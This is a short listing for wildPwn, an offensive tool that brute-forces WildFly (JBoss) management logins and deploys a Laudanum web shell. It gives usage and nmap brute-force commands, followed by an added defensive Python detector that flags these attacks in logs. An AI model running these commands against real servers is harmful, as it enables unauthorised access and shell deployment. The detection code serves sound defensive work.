wildPwn - Brute forcer and shell deployer for WildFly (JBoss AS)


WildFly, formerly known as JBoss AS, or simply JBoss, is an application server authored by JBoss, now developed by Red Hat. WildFly is written in Java, and implements the Java Platform, Enterprise Edition (Java EE) specification. It runs on multiple platforms. WildFly is free and open-source software, subject to the requirements of the GNU Lesser General Public License (LGPL), version 2.1.

wildPwn is a tool for WildFly. It can be used to brute force logins or to deploy a shell. wildPwn.war contains a modified Laudanum Shell, userList.txt contains common usernames, and passList.txt contains common passwords.

Usage
Bruteforce
python wildPwn.py -m brute --target <TARGET> -user <USERNAME LIST> -pass <PASSWORD LIST> 
Shell Deploy
python wildPwn.py -m deploy --target <TARGET> --port <PORT> -u <USERNAME> -p <PASSWORD>

Nmap Scripts
Detection
nmap --script wildfly-detect <TARGET>
Brute Force
nmap -p 9990 --script wildfly-brute --script-args "userdb=usernameList.txt,passdb=passList.txt,hostname=domain.com" <TARGET>
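
For defenders, the brute force and deploy modes above leave a recognizable trail: a burst of 401 responses from one source, then a successful upload. The following is an added example, not part of wildPwn or the original page; it assumes common-log-format access logs for the management port 9990, and the log lines, IP addresses and the paths /management and /management/add-content are constructed or assumed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample (not real traffic). Assumed: common-log-format access
# logs from a proxy in front of the management port 9990, and the paths
# /management and /management/add-content for API calls and uploads.
SAMPLE_LOG = """\
198.51.100.20 - - [12/Mar/2024:09:59:50 +0000] "GET /management HTTP/1.1" 401 77
198.51.100.20 - - [12/Mar/2024:09:59:50 +0000] "GET /management HTTP/1.1" 200 512
203.0.113.7 - - [12/Mar/2024:10:00:01 +0000] "POST /management HTTP/1.1" 401 77
203.0.113.7 - - [12/Mar/2024:10:00:02 +0000] "POST /management HTTP/1.1" 401 77
203.0.113.7 - - [12/Mar/2024:10:00:03 +0000] "POST /management HTTP/1.1" 401 77
203.0.113.7 - - [12/Mar/2024:10:00:04 +0000] "POST /management HTTP/1.1" 401 77
203.0.113.7 - - [12/Mar/2024:10:00:05 +0000] "POST /management HTTP/1.1" 401 77
203.0.113.7 - - [12/Mar/2024:10:00:06 +0000] "POST /management HTTP/1.1" 200 130
203.0.113.7 - - [12/Mar/2024:10:00:09 +0000] "POST /management/add-content HTTP/1.1" 200 98
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')

def detect(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return (brute_sources, deploy_after_brute) as two sets of IPs."""
    failures = defaultdict(deque)   # per-source timestamps of recent 401s
    brute, deploy = set(), set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m["path"].startswith("/management"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ip = m["ip"]
        if m["status"] == "401":
            # A single 401 is a normal auth challenge, so only a burst
            # inside the sliding window counts as password guessing.
            q = failures[ip]
            q.append(ts)
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                brute.add(ip)
        elif (m["status"] == "200" and m["method"] == "POST" and ip in brute
              and m["path"].startswith("/management/add-content")):
            deploy.add(ip)          # successful upload after a guessing burst
    return brute, deploy

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

Tune threshold and window to the normal rate of administrative logins in your environment before alerting on the result.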

More details: https://artofpwn.com/wildfly-exploitation.html

Reviewed by Zion3R on 5:19 PM